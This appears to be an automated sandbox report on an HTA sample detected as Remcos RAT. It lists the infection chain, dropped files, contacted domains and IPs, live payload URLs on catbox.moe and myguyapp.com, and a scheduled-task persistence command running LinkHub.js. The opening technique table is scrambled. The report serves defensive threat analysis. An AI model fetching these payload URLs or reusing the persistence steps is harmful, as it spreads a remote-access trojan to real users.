    Application Layer Protocol    		Data Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items2
    Registry Run Keys / Startup Folder    		121
    Virtualization/Sandbox Evasion    		DCSync4
    Process Discovery    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
    Access Token Manipulation    		Proc Filesystem11
    Application Window Discovery    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
    Process Injection    		/etc/passwd and /etc/shadow1
    System Owner/User Discovery    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585493 Sample: c2.hta Startdate: 07/01/2025 Architecture: WINDOWS Score: 100 96 ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF 2->96 98 x1.i.lencr.org 2->98 100 5 other IPs or domains 2->100 112 Suricata IDS alerts for network traffic 2->112 114 Antivirus detection for URL or domain 2->114 116 Yara detected Remcos RAT 2->116 118 12 other signatures 2->118 12 mshta.exe 17 2->12         started        16 wscript.exe 2->16         started        19 wscript.exe 2->19         started        signatures3 process4 dnsIp5 104 files.catbox.moe 108.181.20.35, 443, 49731 ASN852CA Canada 12->104 86 C:\Users\user\AppData\Local\Temp\temp.bat, Unicode 12->86 dropped 88 C:\Users\user\AppData\Local\...\0o8vth[1].bat, Unicode 12->88 dropped 21 cmd.exe 3 2 12->21         started        24 cmd.exe 12->24         started        106 Windows Scripting host queries suspicious COM object (likely to drop second stage) 16->106 26 LinkHub.com 16->26         started        28 LinkHub.com 19->28         started        file6 signatures7 process8 signatures9 126 Suspicious powershell command line found 21->126 128 Drops PE files with a suspicious file extension 21->128 130 Uses schtasks.exe or at.exe to add and modify task schedules 21->130 30 msword.exe 21->30         started        32 powershell.exe 15 16 21->32         started        37 powershell.exe 21->37         started        43 3 other processes 21->43 39 conhost.exe 24->39         started        41 timeout.exe 24->41         started        process10 dnsIp11 45 cmd.exe 30->45         started        94 myguyapp.com 193.26.115.39, 443, 49735, 49738 QUICKPACKETUS Netherlands 32->94 74 C:\Users\user\Downloads\W2.pdf, PDF 32->74 dropped 108 Powershell drops PE file 32->108 76 C:\Users\user\AppData\Local\...\msword.exe, PE32 37->76 dropped 110 Loading BitLocker PowerShell Module 37->110 78 C:\Users\user\AppData\Local\Temp\msword.zip, Zip 43->78 dropped 48 AcroCEF.exe 107 43->48         started        file12 signatures13 process14 file15 90 C:\Users\user\AppData\Local\...\Propose.com, PE32 45->90 dropped 50 Propose.com 45->50         started        55 conhost.exe 45->55         started        57 tasklist.exe 45->57         started        61 9 other processes 45->61 59 AcroCEF.exe 48->59         started        process16 dnsIp17 102 geoplugin.net 178.237.33.50, 49758, 80 ATOM86-ASATOM86NL Netherlands 50->102 80 C:\Users\user\AppData\Local\...\LinkHub.com, PE32 50->80 dropped 82 C:\Users\user\AppData\Local\...\LinkHub.js, ASCII 50->82 dropped 84 C:\ProgramData\remcos\logs.dat, data 50->84 dropped 120 Detected Remcos RAT 50->120 122 Drops PE files with a suspicious file extension 50->122 124 Installs a global keyboard hook 50->124 63 cmd.exe 50->63         started        66 cmd.exe 50->66         started        file18 signatures19 process20 file21 92 C:\Users\user\AppData\Roaming\...\LinkHub.url, MS 63->92 dropped 68 conhost.exe 63->68         started        70 conhost.exe 66->70         started        72 schtasks.exe 66->72         started        process22

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    c2.hta3%ReversingLabs

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com0%ReversingLabs
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\msword\msword.exe8%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://myguyapp.com/W2.pdfD0%Avira URL Cloudsafe
    https://myguyapp.com/msword.zipK0%Avira URL Cloudsafe
    https://myguyapp.com/msword.zip70%Avira URL Cloudsafe
    https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAMINGP0%Avira URL Cloudsafe
    https://myguyapp.com/msword.zipF0%Avira URL Cloudsafe
    https://files.catbox.moe;0%Avira URL Cloudsafe
    https://myguyapp.com/msword.zipiZ0%Avira URL Cloudsafe
    https://myguyapp.com/W2.pdf0%Avira URL Cloudsafe
    https://myguyapp.com/msword.zip.100%Avira URL Cloudmalware
    https://files.catbl0%Avira URL Cloudsafe
    https://myguyapp.com/W2.pdf&vO0%Avira URL Cloudsafe
    https://files.catbox0%Avira URL Cloudsafe
    https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdf0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    files.catbox.moe
    		108.181.20.35
    		truefalse
      		high
      bg.microsoft.map.fastly.net
      		199.232.210.172
      		truefalse
        		high
        geoplugin.net
        		178.237.33.50
        		truefalse
          		high
          me-work.com
          		193.26.115.39
          		truefalse
            		high
            myguyapp.com
            		193.26.115.39
            		truefalse
              		high
              x1.i.lencr.org
              		unknown
              		unknownfalse
                		high
                ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://myguyapp.com/msword.zipfalse
                    		high
                    http://geoplugin.net/json.gpfalse
                      		high
                      https://myguyapp.com/W2.pdftrue
                      • Avira URL Cloud: safe
                      		unknown
                      https://files.catbox.moe/0o8vth.batfalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://files.catbox.moe/0o8vth.batCmshta.exe, 00000000.00000003.1845946616.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854176771.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854968519.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858498980.00000000031DC000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.7.drfalse
                            		high
                            https://myguyapp.com/msword.zip7tasklist.exe, 00000015.00000003.1901999464.000000000071C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1903882580.000000000071C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://myguyapp.com/msword.zip.tasklist.exe, 00000013.00000002.1897227873.0000000000D48000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://myguyapp.com/msword.zipKtasklist.exe, 00000015.00000003.1901999464.000000000071C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1903882580.000000000071C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.autoitscript.com/autoit3/XPropose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001E.00000000.1919152978.0000000000D25000.00000002.00000001.01000000.0000000F.sdmp, LinkHub.com, 00000026.00000000.1944526047.0000000000D45000.00000002.00000001.01000000.00000011.sdmp, LinkHub.com, 00000028.00000002.2070151475.0000000000D45000.00000002.00000001.01000000.00000011.sdmp, Clinton.26.dr, Propose.com.17.dr, LinkHub.com.30.drfalse
                              		high
                              https://files.catbox.moe/mshta.exe, 00000000.00000003.1843154558.0000000003202000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858235674.000000000314E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1848250807.0000000003214000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1845396099.000000000320C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858635359.0000000003216000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://nsis.sf.net/NSIS_ErrorErrormsword.exe, 0000000D.00000000.1841551557.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe, 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe.11.drfalse
                                  		high
                                  https://myguyapp.com/msword.zipFcmd.exe, 00000020.00000002.1927832628.00000000030A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAMINGPcmd.exe, 00000023.00000002.1928219562.00000000030E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.autoitscript.com/autoit3/Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.drfalse
                                    		high
                                    https://myguyapp.com/msword.zipiZmsword.exe, 0000000D.00000002.1869277410.000000000087E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://myguyapp.com/W2.pdfDcmd.exe, 00000020.00000002.1927832628.00000000030A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://files.catbox.moe;mshta.exe, 00000000.00000003.1856817217.0000000009937000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1843566389.000000000A840000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://files.catblmshta.exe, 00000000.00000003.1843566389.000000000A863000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1859438756.000000000A863000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://files.catbox.moe/0o8vth.bat_mshta.exe, 00000000.00000003.1845946616.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854176771.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854968519.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858498980.00000000031DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://files.catbox.moe/pmshta.exe, 00000000.00000002.1858235674.000000000314E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://files.catboxmshta.exe, 00000000.00000003.1843566389.000000000A863000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1856565051.000000000A8A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfPropose.com, 0000001E.00000003.1925118973.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925065278.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1926628658.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1924979857.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1924940162.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925001537.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1926572699.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925043539.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1924959596.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925023697.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1926599427.0000000000E95000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://files.catbox.moemshta.exe, 00000000.00000003.1856817217.0000000009937000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1843566389.000000000A840000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://files.catbox.moe/0o8vth.battHmshta.exe, 00000000.00000003.1845946616.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854176771.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854968519.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858498980.00000000031DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://files.catbox.moe/0o8vth.bat1mshta.exe, 00000000.00000003.1845946616.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854176771.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854968519.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858498980.00000000031DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://myguyapp.com/W2.pdf&vOtasklist.exe, 00000013.00000003.1896304387.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.1897560257.0000000000D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              108.181.20.35
                                              		files.catbox.moeCanada
                                              		852ASN852CAfalse
                                              178.237.33.50
                                              		geoplugin.netNetherlands
                                              		8455ATOM86-ASATOM86NLfalse
                                              193.26.115.39
                                              		me-work.comNetherlands
                                              		46261QUICKPACKETUSfalse

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1585493
                                              Start date and time:2025-01-07 18:12:06 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 7m 44s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:42
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:c2.hta
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.expl.evad.winHTA@72/99@9/3
                                              EGA Information:
                                              • Successful, ratio: 66.7%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 87
                                              • Number of non-executed functions: 297
                                              Cookbook Comments:
                                              • Found application associated with file extension: .hta

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 23.56.252.213, 2.16.168.105, 2.16.168.107, 18.213.11.84, 50.16.47.176, 34.237.241.83, 54.224.241.105, 162.159.61.3, 172.64.41.3, 199.232.210.172, 23.209.209.135, 184.28.90.27, 172.202.163.200, 23.203.104.175, 13.107.246.44
                                              • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                              • Execution Graph export aborted for target mshta.exe, PID 6164 because there are no executed function
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtCreateFile calls found.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: c2.hta

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              12:12:54API Interceptor1x Sleep call for process: mshta.exe modified
                                              12:12:58API Interceptor55x Sleep call for process: powershell.exe modified
                                              12:13:15API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                              12:13:16API Interceptor1x Sleep call for process: msword.exe modified
                                              12:14:25API Interceptor297x Sleep call for process: Propose.com modified
                                              17:13:23Task SchedulerRun new task: Murray path: wscript s>//B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
                                              17:13:26AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              108.181.20.35Document.pdf.lnkGet hashmaliciousUnknownBrowse
                                              • files.catbox.moe/p1yr9i.pdf
                                              SecuriteInfo.com.HEUR.Trojan.OLE2.Agent.gen.26943.12401.msiGet hashmaliciousLummaC StealerBrowse
                                              • files.catbox.moe/nzct1p
                                              178.237.33.50RailProvides_nopump.exeGet hashmaliciousRemcosBrowse
                                              • geoplugin.net/json.gp
                                              c2.htaGet hashmaliciousRemcosBrowse
                                              • geoplugin.net/json.gp
                                              17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                              • geoplugin.net/json.gp
                                              Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                              • geoplugin.net/json.gp
                                              c2.htaGet hashmaliciousRemcosBrowse
                                              • geoplugin.net/json.gp
                                              4XYAW8PbZH.exeGet hashmaliciousRemcosBrowse
                                              • geoplugin.net/json.gp
                                              iGhDjzEiDU.exeGet hashmaliciousRemcosBrowse
                                              • geoplugin.net/json.gp
                                              1.exeGet hashmaliciousRemcosBrowse
                                              • geoplugin.net/json.gp
                                              Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
                                              • geoplugin.net/json.gp
                                              heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                              • geoplugin.net/json.gp

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              me-work.comRailProvides_nopump.exeGet hashmaliciousRemcosBrowse
                                              • 193.26.115.39
                                              c2.htaGet hashmaliciousRemcosBrowse
                                              • 193.26.115.39
                                              c2.htaGet hashmaliciousRemcosBrowse
                                              • 193.26.115.39
                                              c2.htaGet hashmaliciousXWormBrowse
                                              • 193.26.115.21
                                              c2.htaGet hashmaliciousXWormBrowse
                                              • 193.26.115.21
                                              c2.htaGet hashmaliciousXWormBrowse
                                              • 193.26.115.21
                                              c2.htaGet hashmaliciousXWormBrowse
                                              • 87.120.117.152
                                              p5.htaGet hashmaliciousXWormBrowse
                                              • 45.88.186.197
                                              files.catbox.moeDHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                              • 108.181.20.35
                                              doc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 108.181.20.35
                                              TT copy.jsGet hashmaliciousFormBookBrowse
                                              • 108.181.20.35
                                              z68scancopy.vbsGet hashmaliciousFormBookBrowse
                                              • 108.181.20.35
                                              2zirzlMVqX.batGet hashmaliciousXmrigBrowse
                                              • 108.181.20.35
                                              QwLii5vouB.exeGet hashmaliciousUnknownBrowse
                                              • 108.181.20.35
                                              PO Huaruicarbon 98718.htmlGet hashmaliciousCorporateDataTheft, HTMLPhisherBrowse
                                              • 108.181.20.35
                                              5QnwxSJVyX.docGet hashmaliciousUnknownBrowse
                                              • 108.181.20.35
                                              file.exeGet hashmaliciousFormBookBrowse
                                              • 108.181.20.35
                                              file.exeGet hashmaliciousFormBookBrowse
                                              • 108.181.20.35
                                              bg.microsoft.map.fastly.netFACTURAMAIL.htmlGet hashmaliciousUnknownBrowse
                                              • 199.232.214.172
                                              3e18bdf74f3caef770a7edcf748bdaf0e6a4a21664e69.exeGet hashmaliciousAsyncRAT, GhostRatBrowse
                                              • 199.232.214.172
                                              Kawpow new.exeGet hashmaliciousUnknownBrowse
                                              • 199.232.210.172
                                              https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526Get hashmaliciousUnknownBrowse
                                              • 199.232.214.172
                                              Here is the completed and scanned document.emlGet hashmaliciousUnknownBrowse
                                              • 199.232.214.172
                                              file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zipGet hashmaliciousUnknownBrowse
                                              • 199.232.214.172
                                              c2.htaGet hashmaliciousRemcosBrowse
                                              • 199.232.210.172
                                              sfqbr.ps1Get hashmaliciousDcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                              • 199.232.214.172
                                              Vernales Restaurant-encrypted.pdfGet hashmaliciousHTMLPhisherBrowse
                                              • 199.232.210.172
                                              KHK0987.xlsxGet hashmaliciousUnknownBrowse
                                              • 199.232.214.172
                                              geoplugin.netRailProvides_nopump.exeGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              c2.htaGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              c2.htaGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              4XYAW8PbZH.exeGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              iGhDjzEiDU.exeGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              1.exeGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 178.237.33.50

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              ASN852CAmiori.spc.elfGet hashmaliciousUnknownBrowse
                                              • 207.134.206.79
                                              miori.ppc.elfGet hashmaliciousUnknownBrowse
                                              • 173.182.249.54
                                              momo.arm7.elfGet hashmaliciousMiraiBrowse
                                              • 154.5.112.131
                                              z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                              • 50.99.231.33
                                              sHCznAai4a.batGet hashmaliciousUnknownBrowse
                                              • 108.181.20.35
                                              Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                              • 198.53.124.239
                                              Fantazy.i486.elfGet hashmaliciousUnknownBrowse
                                              • 161.184.66.8
                                              Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                              • 209.52.250.243
                                              1.elfGet hashmaliciousUnknownBrowse
                                              • 161.188.162.114
                                              Hilix.arm7.elfGet hashmaliciousMiraiBrowse
                                              • 75.153.94.164
                                              ATOM86-ASATOM86NLRailProvides_nopump.exeGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              c2.htaGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              9W9jJCj9EV.batGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              c2.htaGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              c2.htaGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              4XYAW8PbZH.exeGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              iGhDjzEiDU.exeGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              1.exeGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              QUICKPACKETUSRailProvides_nopump.exeGet hashmaliciousRemcosBrowse
                                              • 193.26.115.39
                                              c2.htaGet hashmaliciousRemcosBrowse
                                              • 193.26.115.39
                                              https://z97f4f2525fyg27.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                              • 172.82.129.154
                                              9W9jJCj9EV.batGet hashmaliciousRemcosBrowse
                                              • 193.26.115.39
                                              c2.htaGet hashmaliciousRemcosBrowse
                                              • 193.26.115.39
                                              c2.htaGet hashmaliciousRemcosBrowse
                                              • 193.26.115.39
                                              Dd5DwDCHJD.exeGet hashmaliciousQuasarBrowse
                                              • 193.31.28.181
                                              3e88PGFfkf.exeGet hashmaliciousDCRatBrowse
                                              • 185.230.138.58
                                              arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 198.22.235.170
                                              la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                              • 198.22.243.54

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              3b5074b1b5d032e5620f69f9f700ff0eHaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                              • 193.26.115.39
                                              UXxZ4m65ro.exeGet hashmaliciousQuasarBrowse
                                              • 193.26.115.39
                                              Customer.exeGet hashmaliciousXWormBrowse
                                              • 193.26.115.39
                                              Solara Bootstrapper.exeGet hashmaliciousUnknownBrowse
                                              • 193.26.115.39
                                              Solara.exeGet hashmaliciousUnknownBrowse
                                              • 193.26.115.39
                                              vRecording__0023secs__Stgusa.htmlGet hashmaliciousUnknownBrowse
                                              • 193.26.115.39
                                              ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • 193.26.115.39
                                              U1P3u1tkB2.exeGet hashmaliciousUnknownBrowse
                                              • 193.26.115.39
                                              U1P3u1tkB2.exeGet hashmaliciousUnknownBrowse
                                              • 193.26.115.39
                                              9876567899.bat.exeGet hashmaliciousLokibotBrowse
                                              • 193.26.115.39
                                              37f463bf4616ecd445d4a1937da06e19setup.msiGet hashmaliciousUnknownBrowse
                                              • 108.181.20.35
                                              1.exeGet hashmaliciousLummaC, XRedBrowse
                                              • 108.181.20.35
                                              9876567899.bat.exeGet hashmaliciousLokibotBrowse
                                              • 108.181.20.35
                                              23567791246-764698008.02.exeGet hashmaliciousUnknownBrowse
                                              • 108.181.20.35
                                              c2.htaGet hashmaliciousRemcosBrowse
                                              • 108.181.20.35
                                              H565rymIuO.docGet hashmaliciousUnknownBrowse
                                              • 108.181.20.35
                                              287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                                              • 108.181.20.35
                                              287438657364-7643738421.08.exeGet hashmaliciousUnknownBrowse
                                              • 108.181.20.35
                                              u1XWB0BIju.msiGet hashmaliciousUnknownBrowse
                                              • 108.181.20.35
                                              setup.msiGet hashmaliciousUnknownBrowse
                                              • 108.181.20.35

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com[UPD]Intel_Unit.2.1.exeGet hashmaliciousLummaCBrowse
                                                'Set-up.exeGet hashmaliciousLummaCBrowse
                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                    RailProvides_nopump.exeGet hashmaliciousRemcosBrowse
                                                      c2.htaGet hashmaliciousRemcosBrowse
